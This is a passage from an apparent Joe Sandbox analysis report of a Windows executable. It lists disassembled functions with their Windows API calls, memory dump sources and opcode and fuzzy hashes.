                                                                                • Instruction Fuzzy Hash: 52E08658E4A78342FF046BB2581D1F413D06FD4F5AB0C0030C90DE6253DF2C9D968200
                                                                                Function 00007FF6559233E4 Relevance: 1.8, APIs: 1, Instructions: 328COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3668304517-0
                                                                                • Opcode ID: bdf8625448bd8dcd1def64a6508c1891a019ebdf0eaa44acf70db7eea19c6d5a
                                                                                • Instruction ID: 7141c586a7de0d56e61b4af87f7439d512648d22ca32e48daa5da4ed6268b777
                                                                                • Opcode Fuzzy Hash: bdf8625448bd8dcd1def64a6508c1891a019ebdf0eaa44acf70db7eea19c6d5a
                                                                                • Instruction Fuzzy Hash: BDD1B47AB086C256EF288B2599482B967A5FB05F88F0C4035CB5D977A7CF3CEC658701
                                                                                Function 00007FF655935294 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: CompareString_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 1017591355-0
                                                                                • Opcode ID: cc14dedd2e5cc10f866aa6caa5d21262f0f150b8de9e36933eecb23af5082f8f
                                                                                • Instruction ID: 4a6ed38a497f1e9399ef9420efa43d75bc3704f2cc55831800c62903db3c385f
                                                                                • Opcode Fuzzy Hash: cc14dedd2e5cc10f866aa6caa5d21262f0f150b8de9e36933eecb23af5082f8f
                                                                                • Instruction Fuzzy Hash: 1F61F219A0C2C7C1EB689A25981C27A5391EF49FDEF1E5031DE4DE6AC7EF6CEC408201
                                                                                Function 00007FF655941870 Relevance: 1.7, APIs: 1, Instructions: 172COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00007FF65593E948: ReleaseSemaphore.KERNEL32 ref: 00007FF65593E974
                                                                                  • Part of subcall function 00007FF65593E948: FindCloseChangeNotification.KERNELBASE ref: 00007FF65593E993
                                                                                  • Part of subcall function 00007FF65593E948: DeleteCriticalSection.KERNEL32 ref: 00007FF65593E9AA
                                                                                  • Part of subcall function 00007FF65593E948: CloseHandle.KERNEL32 ref: 00007FF65593E9B7
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF655941ACB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Close$ChangeCriticalDeleteFindHandleNotificationReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 1624603282-0
                                                                                • Opcode ID: 9769b8d8c6adf9e9843dd34bf36c89e921551141ac818f266a3f44a314c80fc1
                                                                                • Instruction ID: e7d8bc170d4d06d02eaa5b83eb3db563266edd982cc9d04a24d46b2ea17e1ddf
                                                                                • Opcode Fuzzy Hash: 9769b8d8c6adf9e9843dd34bf36c89e921551141ac818f266a3f44a314c80fc1
                                                                                • Instruction Fuzzy Hash: 8A618F66B157C592EE08DB65D5580BCB365FF40F98B584232D76D97A82CF2CECB18300
                                                                                Function 00007FF65592EC9C Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3668304517-0
                                                                                • Opcode ID: 90bbbe4b03adee6de0a9cfeccf93459ff6427d4f8da8a47d00f3fc41b718dbf5
                                                                                • Instruction ID: d1c73f8a3cbe0ee9b32422ecafdb7c2b07d3c4d0549abd9527b30bef77924191
                                                                                • Opcode Fuzzy Hash: 90bbbe4b03adee6de0a9cfeccf93459ff6427d4f8da8a47d00f3fc41b718dbf5
                                                                                • Instruction Fuzzy Hash: 9251A36AA086C180EA149B15D8883BD6751FB85FC8F4C013AEE5DA7397DF3DE885C300
                                                                                Function 00007FF65592E7A8 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00007FF655933EC8: FindClose.KERNELBASE(?,?,00000000,00007FF655940811), ref: 00007FF655933EFD
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF65592E993
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 1011579015-0
                                                                                • Opcode ID: 291e6fd2762174cc1189c8c1297697099ae6cbf60ac3dcc79b926deda7363788
                                                                                • Instruction ID: f2f449475e2eed326495b57c8e0b0f2750f75fab3855cafecd6d4d3058bbbf23
                                                                                • Opcode Fuzzy Hash: 291e6fd2762174cc1189c8c1297697099ae6cbf60ac3dcc79b926deda7363788
                                                                                • Instruction Fuzzy Hash: DF51422AA186C581FE609B25D88937D6361FF84F8CF580136EA8DA77A7DF2CD841C710
                                                                                Function 00007FF655931794 Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3668304517-0
                                                                                • Opcode ID: 441d94010831a9f6ef5d16cdf5dc6aa6cd9069c8d4b228be56634cb7a29f4368
                                                                                • Instruction ID: 777bafdc8e424411135053a9ef6d72a86e20b2fe15e2d98fc6cca7e7f727779c
                                                                                • Opcode Fuzzy Hash: 441d94010831a9f6ef5d16cdf5dc6aa6cd9069c8d4b228be56634cb7a29f4368
                                                                                • Instruction Fuzzy Hash: E541E866B18AC182EA149A17EA4837AA291FF44FC4F4D8535EE4C97F5BDF3CD9918300
                                                                                Function 00007FF655932F58 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3668304517-0
                                                                                • Opcode ID: ef3369d01a97c9aa4f3b4977493ba9f0ef8ebed8b0182d05534ad700cb30ef07
                                                                                • Instruction ID: 112ae603763ab02c742e246e2461fe5750112f05d2f592dae6a78ad197065b95
                                                                                • Opcode Fuzzy Hash: ef3369d01a97c9aa4f3b4977493ba9f0ef8ebed8b0182d05534ad700cb30ef07
                                                                                • Instruction Fuzzy Hash: 2A41046AA18B81C1EE109B29E54D37963A1EB85FDCF191134EA4D9779BDF3CE840C600
                                                                                Function 00007FF65595BDF8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule$AddressFreeLibraryProc
                                                                                • String ID:
                                                                                • API String ID: 3947729631-0
                                                                                • Opcode ID: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
                                                                                • Instruction ID: 44ec5b3da2e4b73138c1aee5e05e14f98b35fa80c59428bf7f645dcc4bda8ae9
                                                                                • Opcode Fuzzy Hash: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
                                                                                • Instruction Fuzzy Hash: 2B41C439A186C282FB249B11A4581782292AF55F49F4C443ADA0EF76A3DF3CEC55C781
                                                                                Function 00007FF65592129C Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                                                                • String ID:
                                                                                • API String ID: 680105476-0
                                                                                • Opcode ID: 6f88c17e658a7e6a764477403b9247f1d27f5880b65831beeeee99c6ba04093e
                                                                                • Instruction ID: 2d3a71b7debc1b797cfe031fd46b6de2695ad268494df6d2f03c94ddea7907e9
                                                                                • Opcode Fuzzy Hash: 6f88c17e658a7e6a764477403b9247f1d27f5880b65831beeeee99c6ba04093e
                                                                                • Instruction Fuzzy Hash: A1219F26A0929185EA149E91A80827D6251EB04FF4F6C0B30DE3DA7BC2DF7CE8619344
                                                                                Function 00007FF655922C54 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3668304517-0
                                                                                • Opcode ID: 0c8e9c2245f2fbf425fa0cd7f95d31ecd9f6f203860eee89bbc703c5aebe3acc
                                                                                • Instruction ID: 921a82d8fbbbab4257b28c3d0792b1ec2295cd133b457d4c7b56af4d4772400a
                                                                                • Opcode Fuzzy Hash: 0c8e9c2245f2fbf425fa0cd7f95d31ecd9f6f203860eee89bbc703c5aebe3acc
                                                                                • Instruction Fuzzy Hash: 53217F2AB185C261EA08DB60D9483FCA310FB44F88F984031E71D976A3CF3CA864C300
                                                                                Function 00007FF65596124C Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 3215553584-0
                                                                                • Opcode ID: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
                                                                                • Instruction ID: 6cd099d37a3dfb9f1c42e876f902f729ff942dc90a291dc19b0f5adf2122e508
                                                                                • Opcode Fuzzy Hash: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
                                                                                • Instruction Fuzzy Hash: C9117C3A90C7C382FB109B50A48813962A4FF40B88F5C0135EA8DE7693DF3CEC549780
                                                                                Function 00007FF655923AD8 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3668304517-0
                                                                                • Opcode ID: e211765aad0e482f14211f193c2fa738a397cbf9b51fc622cf430de4bdc09e7c
                                                                                • Instruction ID: b3668bbe3fcbaad7e6b33e5b107071b8fadac27fe96dd4f7f0d4240d4f66224e
                                                                                • Opcode Fuzzy Hash: e211765aad0e482f14211f193c2fa738a397cbf9b51fc622cf430de4bdc09e7c
                                                                                • Instruction Fuzzy Hash: 860126AAE187C541EE119B28E84923D7361FFC9F98F844231E69C97BA7DF2CD4408704
                                                                                Function 00007FF655951558 Relevance: 1.5, APIs: 1, Instructions: 38COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00007FF655951604: GetModuleHandleW.KERNEL32(?,?,?,00007FF655951573,?,?,?,00007FF65595192A), ref: 00007FF65595162B
                                                                                • DloadProtectSection.DELAYIMP ref: 00007FF6559515C9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: DloadHandleModuleProtectSection
                                                                                • String ID:
                                                                                • API String ID: 2883838935-0
                                                                                • Opcode ID: 908f49ac33541a8240f4269ada82e733cc5c0c647bda27ab8868a2cee9a60ef3
                                                                                • Instruction ID: e3df5d3a0e9d99988518a3110582003543fa7001c4e29f8b3bab9a8a4fc6d6c0
                                                                                • Opcode Fuzzy Hash: 908f49ac33541a8240f4269ada82e733cc5c0c647bda27ab8868a2cee9a60ef3
                                                                                • Instruction Fuzzy Hash: 9E11BEA8D0D6C741FB619B15A86C3B01390AF14B4DF1C0874C94DE62A3FF3CACA9D652
                                                                                Function 00007FF65595FA04 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
                                                                                • Instruction ID: 29670c58c8fc7bb45c3f87ec6d624426bdc4f369d6fb0ce51f072c22641b236c
                                                                                • Opcode Fuzzy Hash: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
                                                                                • Instruction Fuzzy Hash: 3EF06D9CF0A78745FE545B6199193B412819F84FAAF0C5430C90EEA3C3FF2CEEA54212
                                                                                Function 00007FF655933EC8 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00007FF6559340BC: FindFirstFileW.KERNELBASE ref: 00007FF65593410B
                                                                                  • Part of subcall function 00007FF6559340BC: FindFirstFileW.KERNEL32 ref: 00007FF65593415E
                                                                                  • Part of subcall function 00007FF6559340BC: GetLastError.KERNEL32 ref: 00007FF6559341AF
                                                                                • FindClose.KERNELBASE(?,?,00000000,00007FF655940811), ref: 00007FF655933EFD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Find$FileFirst$CloseErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1464966427-0
                                                                                • Opcode ID: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
                                                                                • Instruction ID: aeceaf16711f5c270c2cac9670188f6ae2956f42947a9f69d5eaec6f0a031790
                                                                                • Opcode Fuzzy Hash: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
                                                                                • Instruction Fuzzy Hash: CCF0A46A50C2C1C5EA10AB79A1081B937A09B15FB8F5E5334EA3D572C7CF2CD844C745
                                                                                Function 00007FF6559320D0 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindCloseChangeNotification.KERNELBASE(?,?,00000001,00007FF65593207E), ref: 00007FF6559320F6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: ChangeCloseFindNotification
                                                                                • String ID:
                                                                                • API String ID: 2591292051-0
                                                                                • Opcode ID: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                                                                • Instruction ID: 4b9ea9cc25c2b3478fb0057fe1cf2e7b40dc0d98b7dcce35c34f78611220ce53
